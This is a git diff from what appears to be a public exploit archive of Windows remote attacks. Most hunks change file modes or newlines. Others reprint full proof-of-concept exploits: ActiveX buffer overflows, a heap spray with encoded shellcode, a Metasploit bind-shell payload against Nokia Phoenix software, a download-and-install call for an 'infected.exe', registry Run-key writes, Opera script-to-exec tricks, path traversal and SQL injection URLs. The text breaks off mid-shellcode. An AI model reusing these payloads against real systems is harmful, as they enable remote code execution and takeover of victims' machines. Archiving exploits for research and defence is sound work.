document.writeln("while(vcbcv.length+224<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;"); document.writeln("gdfgdh = new Array();"); document.writeln("for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;"); document.writeln("var hellohack = \'\';"); document.writeln("while (hellohack.length < 600) hellohack+=\'\\x0a\\x0a\\x0a\\x0a\';"); document.writeln("target[\"\\x49\\x45\\x53\\x74\\x61\\x72\\x74\\x4e\\x61\\x74\\x69\\x76\\x65\"](hellohack,\"CikeVipWm\",\"fuckyou\");"); document.writeln("<\/script>"); document.writeln("<\/body>"); document.writeln("<\/html>"); document.writeln("") </script> \ No newline at end of file diff --git a/platforms/windows/remote/31873.xml b/platforms/windows/remote/31873.xml old mode 100755 new mode 100644 index cc4f2c6b5..94df80d18 --- a/platforms/windows/remote/31873.xml +++ b/platforms/windows/remote/31873.xml @@ -8,4 +8,4 @@ HP Instant Support 1.0.0.22 and earlier versions are affected. NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. -<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String" memberName = "ExtractCab" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1=String(277, "B") arg2="defaultV" target.ExtractCab arg1 ,arg2 </script></job></package> \ No newline at end of file +<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String" memberName = "ExtractCab" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1=String(277, "B") arg2="defaultV" target.ExtractCab arg1 ,arg2 </script></job></package> \ No newline at end of file diff --git a/platforms/windows/remote/31909.html b/platforms/windows/remote/31909.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31980.html b/platforms/windows/remote/31980.html old mode 100755 new mode 100644 index 72fca624d..ff4ae9eec --- a/platforms/windows/remote/31980.html +++ b/platforms/windows/remote/31980.html @@ -6,4 +6,4 @@ Attackers may exploit this issue to overwrite sensitive files with malicious dat UUSee 2008 is vulnerable; other versions may also be affected. -<html> <object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http://www.example.com/UU.ini" arg3="http://www.example2.com/mini3/uusee_client_update/remark.php" arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 </script> </html> \ No newline at end of file +<html> <object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http://www.example.com/UU.ini" arg3="http://www.example2.com/mini3/uusee_client_update/remark.php" arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 </script> </html> \ No newline at end of file diff --git a/platforms/windows/remote/31996.txt b/platforms/windows/remote/31996.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/31997.txt b/platforms/windows/remote/31997.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32049.txt b/platforms/windows/remote/32049.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32052.html b/platforms/windows/remote/32052.html old mode 100755 new mode 100644 index 262f8c34e..a98ff21b2 --- a/platforms/windows/remote/32052.html +++ b/platforms/windows/remote/32052.html @@ -4,4 +4,4 @@ Sina DLoader is prone to a vulnerability that can cause malicious files to be do Attackers may exploit this issue to overwrite sensitive files with malicious data that will compromise the affected computer. Other attacks are possible. -<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT> <SCRIPT> var YEtYcJsR1="http://example.com/infected.exe"; install["DownloadAndInstall"](YEtYcJsR1); </SCRIPT> \ No newline at end of file +<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT> <SCRIPT> var YEtYcJsR1="http://example.com/infected.exe"; install["DownloadAndInstall"](YEtYcJsR1); </SCRIPT> \ No newline at end of file diff --git a/platforms/windows/remote/32124.txt b/platforms/windows/remote/32124.txt old mode 100755 new mode 100644 index 9fc0205d3..f1b950f2f --- a/platforms/windows/remote/32124.txt +++ b/platforms/windows/remote/32124.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code in the context of a This issue affects 'CoVideoWindow.ocx' 5.0.907.1; other versions may also be affected. -<html> <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object> <input language=VBScript onclick=buffero() type=button value="Crash"> <script language = 'vbscript'> Sub buffero() crash = String(515000, unescape("%41")) test.BgColor = crash End Sub </script> </html> \ No newline at end of file +<html> <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object> <input language=VBScript onclick=buffero() type=button value="Crash"> <script language = 'vbscript'> Sub buffero() crash = String(515000, unescape("%41")) test.BgColor = crash End Sub </script> </html> \ No newline at end of file diff --git a/platforms/windows/remote/32129.cpp b/platforms/windows/remote/32129.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32339.txt b/platforms/windows/remote/32339.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32344.txt b/platforms/windows/remote/32344.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32345.cpp b/platforms/windows/remote/32345.cpp old mode 100755 new mode 100644 index 12358b711..118d71d1c --- a/platforms/windows/remote/32345.cpp +++ b/platforms/windows/remote/32345.cpp @@ -97,4 +97,4 @@ return 0; system("color 03"); Sleep(2000); - } \ No newline at end of file + } \ No newline at end of file diff --git a/platforms/windows/remote/32426.c b/platforms/windows/remote/32426.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32429.html b/platforms/windows/remote/32429.html old mode 100755 new mode 100644 index 3625211c6..c785279db --- a/platforms/windows/remote/32429.html +++ b/platforms/windows/remote/32429.html @@ -7,4 +7,4 @@ An attacker can exploit this issue to execute arbitrary code in the context of t ZENworks Desktop Management 6.5 is vulnerable; other versions may also be affected. -< html> < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html> \ No newline at end of file +< html> < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html> \ No newline at end of file diff --git a/platforms/windows/remote/32442.c b/platforms/windows/remote/32442.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32456.txt b/platforms/windows/remote/32456.txt old mode 100755 new mode 100644 index 3dc1a549b..7b67f1b02 --- a/platforms/windows/remote/32456.txt +++ b/platforms/windows/remote/32456.txt @@ -14,4 +14,4 @@ pass test rnfr any_exist_file.ext 350 File or directory exists, ready for destination name. rnto ..\..\..\boot.ini -250 RNTO command successful. \ No newline at end of file +250 RNTO command successful. \ No newline at end of file diff --git a/platforms/windows/remote/32457.txt b/platforms/windows/remote/32457.txt old mode 100755 new mode 100644 index d6f6611d9..4f6253d55 --- a/platforms/windows/remote/32457.txt +++ b/platforms/windows/remote/32457.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc XAMPP 1.6.8 for Windows is vulnerable; other versions may also be affected. -http://www.example.com/xampp/cds.php?action=del&id=1 or 1 \ No newline at end of file +http://www.example.com/xampp/cds.php?action=del&id=1 or 1 \ No newline at end of file diff --git a/platforms/windows/remote/32460.txt b/platforms/windows/remote/32460.txt old mode 100755 new mode 100644 index fb5fd0690..b62937332 --- a/platforms/windows/remote/32460.txt +++ b/platforms/windows/remote/32460.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc XAMPP 1.6.8 for Windows is vulnerable; other versions may also be affected. -http://www.example.com/xampp/phonebook.php?action=del&id=1 or 1 \ No newline at end of file +http://www.example.com/xampp/phonebook.php?action=del&id=1 or 1 \ No newline at end of file diff --git a/platforms/windows/remote/32465.pl b/platforms/windows/remote/32465.pl index e43cb27a3..843db8ab0 100755 --- a/platforms/windows/remote/32465.pl +++ b/platforms/windows/remote/32465.pl @@ -169,4 +169,4 @@ print $sock encode_base64($bufferz) . "\r\n" . "--Apple-Download-3-188295813--\r\n" . ".\r\n"; -sleep 2; \ No newline at end of file +sleep 2; \ No newline at end of file diff --git a/platforms/windows/remote/32489.txt b/platforms/windows/remote/32489.txt old mode 100755 new mode 100644 index 1c6ead316..2c7fb3646 --- a/platforms/windows/remote/32489.txt +++ b/platforms/windows/remote/32489.txt @@ -8,4 +8,4 @@ OWA 6.5 SP 2 is vulnerable; other versions may also be affected. https://webmail.example.com/exchweb/bin/redir.asp?URL=http://www.example2.com -https://webmail.example.com/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.example2.com&reason=0 \ No newline at end of file +https://webmail.example.com/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.example2.com&reason=0 \ No newline at end of file diff --git a/platforms/windows/remote/32491.html b/platforms/windows/remote/32491.html old mode 100755 new mode 100644 index e18936bcc..303b70b39 --- a/platforms/windows/remote/32491.html +++ b/platforms/windows/remote/32491.html @@ -4,4 +4,4 @@ Hummingbird HostExplorer ActiveX control is prone to a buffer-overflow vulnerabi An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions. -<html> <!-- the latest version of this activex (13.0) is compiled with /gs, earlier versions aren't. The XXXX would have overwritten return address. by thomas.pollet@gmail.com --> <object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object> <script language='vbscript'> arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX" target.PlainTextPassword = arg1 </script> </html> \ No newline at end of file +<html> <!-- the latest version of this activex (13.0) is compiled with /gs, earlier versions aren't. The XXXX would have overwritten return address. by thomas.pollet@gmail.com --> <object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object> <script language='vbscript'> arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX" target.PlainTextPassword = arg1 </script> </html> \ No newline at end of file diff --git a/platforms/windows/remote/32493.html b/platforms/windows/remote/32493.html old mode 100755 new mode 100644 index a6b813dc3..32384182e --- a/platforms/windows/remote/32493.html +++ b/platforms/windows/remote/32493.html @@ -8,4 +8,4 @@ Successfully exploiting these issues allows remote attackers to edit registry ke Hummingbird Deployment Wizard 10 10.0.0.44 is vulnerable; other versions may also be affected. -<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.Run "cmd.exe", "/C calc.exe" End Sub </script> <object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe 'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change" test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!" End Sub </script> <object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.PerformUpdateAsync "calc.exe" End Sub </script> \ No newline at end of file +<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.Run "cmd.exe", "/C calc.exe" End Sub </script> <object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe 'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change" test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!" End Sub </script> <object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.PerformUpdateAsync "calc.exe" End Sub </script> \ No newline at end of file diff --git a/platforms/windows/remote/32517.html b/platforms/windows/remote/32517.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32518.html b/platforms/windows/remote/32518.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32555.html b/platforms/windows/remote/32555.html old mode 100755 new mode 100644 index fd768036e..3c9f92cd8 --- a/platforms/windows/remote/32555.html +++ b/platforms/windows/remote/32555.html @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would run in the context of the affected Opera Web Browser 9.62 is vulnerable. -<!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com --> <html> <script> function execcalc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br> <script> function execcalca() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br> <script> function execcalcb() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br> <script> function execcalcc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br> <script> function execcalcd() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br> </html> \ No newline at end of file +<!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com --> <html> <script> function execcalc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br> <script> function execcalca() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br> <script> function execcalcb() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br> <script> function execcalcc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br> <script> function execcalcd() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br> </html> \ No newline at end of file diff --git a/platforms/windows/remote/32643.txt b/platforms/windows/remote/32643.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3265.pm b/platforms/windows/remote/3265.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32654.txt b/platforms/windows/remote/32654.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32684.c b/platforms/windows/remote/32684.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32699.txt b/platforms/windows/remote/32699.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32711.txt b/platforms/windows/remote/32711.txt old mode 100755 new mode 100644 index 883eefa56..e7d683e1d --- a/platforms/windows/remote/32711.txt +++ b/platforms/windows/remote/32711.txt @@ -11,4 +11,4 @@ Service Level Management 3.5 Submitting the following command through netcat or telnet is sufficient to exploit this issue: -[ipconfig /all] \ No newline at end of file +[ipconfig /all] \ No newline at end of file diff --git a/platforms/windows/remote/3274.txt b/platforms/windows/remote/3274.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/3279.html b/platforms/windows/remote/3279.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/32799.html b/platforms/windows/remote/32799.html old mode 100755 new mode 100644 index 67b5890fc..6e57a65d1 --- a/platforms/windows/remote/32799.html +++ b/platforms/windows/remote/32799.html @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Nokia Phoenix Service Software 2008.04.007.32837 is vulnerable; other versions may also be affected. -<html> <object classid='clsid:F85B4A10-B530-4D68-A714-7415838FD174' id='Fucker'></object> <script language = 'vbscript'> junk = String(370, "A") EIP = unescape("%53%49%48%7E") 'call esp from user32.dll XpPro Sp3/IE7 nop = String(12, unescape("%90")) <!-- win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com --> shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") shellcode=shellcode+unescape("%49%49%37%49%49%49%49%49%49%49%49%49%51%5a%6a%67") shellcode=shellcode+unescape("%58%30%42%31%50%41%42%6b%42%41%77%32%42%42%32%41") shellcode=shellcode+unescape("%41%30%41%41%42%58%38%42%42%50%75%6b%59%39%6c%50") shellcode=shellcode+unescape("%6a%7a%4b%70%4d%6d%38%4b%49%6b%4f%59%6f%69%6f%31") shellcode=shellcode+unescape("%70%4e%6b%72%4c%51%34%56%44%4e%6b%30%45%57%4c%4c") shellcode=shellcode+unescape("%4b%33%4c%57%75%53%48%45%51%68%6f%6e%6b%32%6f%52") shellcode=shellcode+unescape("%38%4e%6b%53%6f%61%30%45%51%5a%4b%42%69%4e%6b%56") shellcode=shellcode+unescape("%54%4e%6b%47%71%78%6e%45%61%4b%70%6f%69%4c%6c%6d") shellcode=shellcode+unescape("%54%6f%30%71%64%65%57%58%41%68%4a%76%6d%35%51%6b") shellcode=shellcode+unescape("%72%78%6b%6c%34%75%6b%73%64%75%74%75%78%51%65%49") shellcode=shellcode+unescape("%75%6e%6b%51%4f%36%44%57%71%5a%4b%70%66%6e%6b%34") shellcode=shellcode+unescape("%4c%30%4b%6c%4b%73%6f%47%6c%65%51%4a%4b%73%33%64") shellcode=shellcode+unescape("%6c%4e%6b%4b%39%70%6c%31%34%77%6c%75%31%69%53%65") shellcode=shellcode+unescape("%61%49%4b%52%44%6e%6b%32%63%36%50%6e%6b%33%70%74") shellcode=shellcode+unescape("%4c%6c%4b%74%30%45%4c%4c%6d%6e%6b%77%30%57%78%61") shellcode=shellcode+unescape("%4e%73%58%6c%4e%50%4e%36%6e%38%6c%56%30%79%6f%38") shellcode=shellcode+unescape("%56%55%36%72%73%65%36%30%68%44%73%34%72%65%38%42") shellcode=shellcode+unescape("%57%53%43%77%42%61%4f%31%44%6b%4f%6e%30%45%38%4a") shellcode=shellcode+unescape("%6b%48%6d%4b%4c%77%4b%46%30%69%6f%4a%76%61%4f%4b") shellcode=shellcode+unescape("%39%6b%55%62%46%4b%31%48%6d%75%58%76%62%43%65%73") shellcode=shellcode+unescape("%5a%35%52%6b%4f%4e%30%55%38%6e%39%65%59%6b%45%6e") shellcode=shellcode+unescape("%4d%62%77%4b%4f%69%46%51%43%46%33%71%43%52%73%63") shellcode=shellcode+unescape("%63%43%73%30%53%70%43%61%43%59%6f%6e%30%72%46%75") shellcode=shellcode+unescape("%38%52%31%71%4c%33%56%43%63%6d%59%59%71%6c%55%72") shellcode=shellcode+unescape("%48%6f%54%66%7a%70%70%4b%77%50%57%4b%4f%4b%66%63") shellcode=shellcode+unescape("%5a%36%70%71%41%50%55%4b%4f%4e%30%61%78%4f%54%4c") shellcode=shellcode+unescape("%6d%56%4e%69%79%52%77%6b%4f%5a%76%36%33%43%65%59") shellcode=shellcode+unescape("%6f%5a%70%45%38%6a%45%30%49%6c%46%57%39%72%77%59") shellcode=shellcode+unescape("%6f%7a%76%50%50%71%44%70%54%52%75%39%6f%58%50%6e") shellcode=shellcode+unescape("%73%42%48%4b%57%71%69%38%46%33%49%41%47%39%6f%49") shellcode=shellcode+unescape("%46%30%55%49%6f%4a%70%50%66%61%7a%31%74%43%56%52") shellcode=shellcode+unescape("%48%75%33%62%4d%6c%49%49%75%71%7a%42%70%50%59%54") shellcode=shellcode+unescape("%69%4a%6c%4c%49%39%77%42%4a%57%34%4b%39%69%72%65") shellcode=shellcode+unescape("%61%4b%70%58%73%6d%7a%6b%4e%50%42%76%4d%6b%4e%50") shellcode=shellcode+unescape("%42%76%4c%4d%43%6e%6d%73%4a%65%68%6e%4b%6e%4b%4c") shellcode=shellcode+unescape("%6b%71%78%32%52%6b%4e%4f%43%34%56%69%6f%72%55%32") shellcode=shellcode+unescape("%64%49%6f%7a%76%43%6b%56%37%56%32%70%51%30%51%32") shellcode=shellcode+unescape("%71%43%5a%37%71%41%41%73%61%63%65%66%31%4b%4f%5a") shellcode=shellcode+unescape("%70%70%68%6e%4d%79%49%73%35%5a%6e%61%43%49%6f%58") shellcode=shellcode+unescape("%56%50%6a%49%6f%59%6f%64%77%59%6f%58%50%4c%4b%32") shellcode=shellcode+unescape("%77%6b%4c%4e%63%48%44%63%54%6b%4f%4e%36%46%32%69") shellcode=shellcode+unescape("%6f%38%50%51%78%78%70%4f%7a%76%64%31%4f%63%63%69") shellcode=shellcode+unescape("%6f%4b%66%6b%4f%68%50%67") NokiaFucker = junk + EIP + nop + shellcode Fucker.SelectDevice NokiaFucker,"" </script> </html> \ No newline at end of file +<html> <object classid='clsid:F85B4A10-B530-4D68-A714-7415838FD174' id='Fucker'></object> <script language = 'vbscript'> junk = String(370, "A") EIP = unescape("%53%49%48%7E") 'call esp from user32.dll XpPro Sp3/IE7 nop = String(12, unescape("%90")) <!-- win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com --> shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") shellcode=shellcode+unescape("%49%49%37%49%49%49%49%49%49%49%49%49%51%5a%6a%67") shellcode=shellcode+unescape("%58%30%42%31%50%41%42%6b%42%41%77%32%42%42%32%41") shellcode=shellcode+unescape("%41%30%41%41%42%58%38%42%42%50%75%6b%59%39%6c%50") shellcode=shellcode+unescape("%6a%7a%4b%70%4d%6d%38%4b%49%6b%4f%59%6f%69%6f%31") shellcode=shellcode+unescape("%70%4e%6b%72%4c%51%34%56%44%4e%6b%30%45%57%4c%4c") shellcode=shellcode+unescape("%4b%33%4c%57%75%53%48%45%51%68%6f%6e%6b%32%6f%52") shellcode=shellcode+unescape("%38%4e%6b%53%6f%61%30%45%51%5a%4b%42%69%4e%6b%56") shellcode=shellcode+unescape("%54%4e%6b%47%71%78%6e%45%61%4b%70%6f%69%4c%6c%6d") shellcode=shellcode+unescape("%54%6f%30%71%64%65%57%58%41%68%4a%76%6d%35%51%6b") shellcode=shellcode+unescape("%72%78%6b%6c%34%75%6b%73%64%75%74%75%78%51%65%49") shellcode=shellcode+unescape("%75%6e%6b%51%4f%36%44%57%71%5a%4b%70%66%6e%6b%34") shellcode=shellcode+unescape("%4c%30%4b%6c%4b%73%6f%47%6c%65%51%4a%4b%73%33%64") shellcode=shellcode+unescape("%6c%4e%6b%4b%39%70%6c%31%34%77%6c%75%31%69%53%65") shellcode=shellcode+unescape("%61%49%4b%52%44%6e%6b%32%63%36%50%6e%6b%33%70%74") shellcode=shellcode+unescape("%4c%6c%4b%74%30%45%4c%4c%6d%6e%6b%77%30%57%78%61") shellcode=shellcode+unescape("%4e%73%58%6c%4e%50%4e%36%6e%38%6c%56%30%79%6f%38") shellcode=shellcode+unescape("%56%55%36%72%73%65%36%30%68%44%73%34%72%65%38%42") shellcode=shellcode+unescape("%57%53%43%77%42%61%4f%31%44%6b%4f%6e%30%45%38%4a") shellcode=shellcode+unescape("%6b%48%6d%4b%4c%77%4b%46%30%69%6f%4a%76%61%4f%4b") shellcode=shellcode+unescape("%39%6b%55%62%46%4b%31%48%6d%75%58%76%62%43%65%73") shellcode=shellcode+unescape("%5a%35%52%6b%4f%4e%30%55%38%6e%39%65%59%6b%45%6e") shellcode=shellcode+unescape("%4d%62%77%4b%4f%69%46%51%43%46%33%71%43%52%73%63") shellcode=shellcode+unescape("%63%43%73%30%53%70%43%61%43%59%6f%6e%30%72%46%75") shellcode=shellcode+unescape("%38%52%31%71%4c%33%56%43%63%6d%59%59%71%6c%55%72") shellcode=shellcode+unescape("%48%6f%54%66%7a%70%70%4b%77%50%57%4b%4f%4b%66%63") shellcode=shellcode+unescape("%5a%36%70%71%41%50%55%4b%4f%4e%30%61%78%4f%54%4c") shellcode=shellcode+unescape("%6d%56%4e%69%79%52%77%6b%4f%5a%76%36%33%43%65%59") shellcode=shellcode+unescape("%6f%5a%70%45%38%6a%45%30%49%6c%46%57%39%72%77%59") shellcode=shellcode+unescape("%6f%7a%76%50%50%71%44%70%54%52%75%39%6f%58%50%6e") shellcode=shellcode+unescape("%73%42%48%4b%57%71%69%38%46%33%49%41%47%39%6f%49") 